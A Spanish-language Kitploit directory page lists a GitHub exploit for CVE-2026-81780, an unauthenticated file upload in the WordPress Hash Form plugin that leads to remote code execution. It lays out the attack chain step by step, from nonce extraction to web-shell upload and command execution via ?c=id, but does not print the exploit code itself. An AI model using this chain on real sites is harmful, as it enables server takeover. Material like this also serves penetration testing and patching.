Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-81780-Hash-Form — Exploit para CVE-2026-81780: carga de archivos sin autenticación en el plugin Hash Form de WordPress que conduce a la ejecución remota de código mediante payloads PHP manipulados. | Kitploit
Herramientas/GitHubGitHub/0xterror/cve-2026-81780-hash-form
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHub0xterror/cve-2026-81780-hash-form

CVE-2026-81780-Hash-Form

Exploit para CVE-2026-81780: carga de archivos sin autenticación en el plugin Hash Form de WordPress que conduce a la ejecución remota de código mediante payloads PHP manipulados.

Ver Repositorio
hace 15h 30mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-81780-Hash-Form

CVE-2026-81780 — Hash Form RCE

La vulnerabilidad

Carga de archivos sin autenticación en el plugin Hash Form de WordPress (≤ 1.4.2). El plugin permite la carga arbitraria de archivos sin una autenticación adecuada ni validación del tipo de archivo, lo que conduce a la Ejecución Remota de Código (RCE).


Cadena de explotación

Paso Acción 1 El atacante comprueba el plugin Hash Form mediante readme.txt 2 Extrae ajax_nounce previsualizando formularios (hashform_preview) 3 Envía una solicitud POST a hashform_file_upload_action con el payload PHP 4 Sube una web shell como .phar, .phtml, .php5 o .php7 5 Activa la shell accediendo a /wp-content/uploads/hashform/temp/v.{ext} 6 Ejecuta comandos del sistema mediante ?c=id

root@kitploit:~

GET /wp-content/plugins/hash-form/readme.txt
    ↓
Versión detectada (≤ 1.4.2)
    ↓
GET /wp-admin/admin-ajax.php?action=hashform_preview&form=1
    ↓
Extraer Nonce: ajax_nounce=...
    ↓
POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action
    ↓
Subir: v.phar (o .phtml, .php5, .php7)
    ↓
GET /wp-content/uploads/hashform/temp/v.phar?c=id
    ↓
Comando ejecutado (uid=www-data)```
Descargar herramienta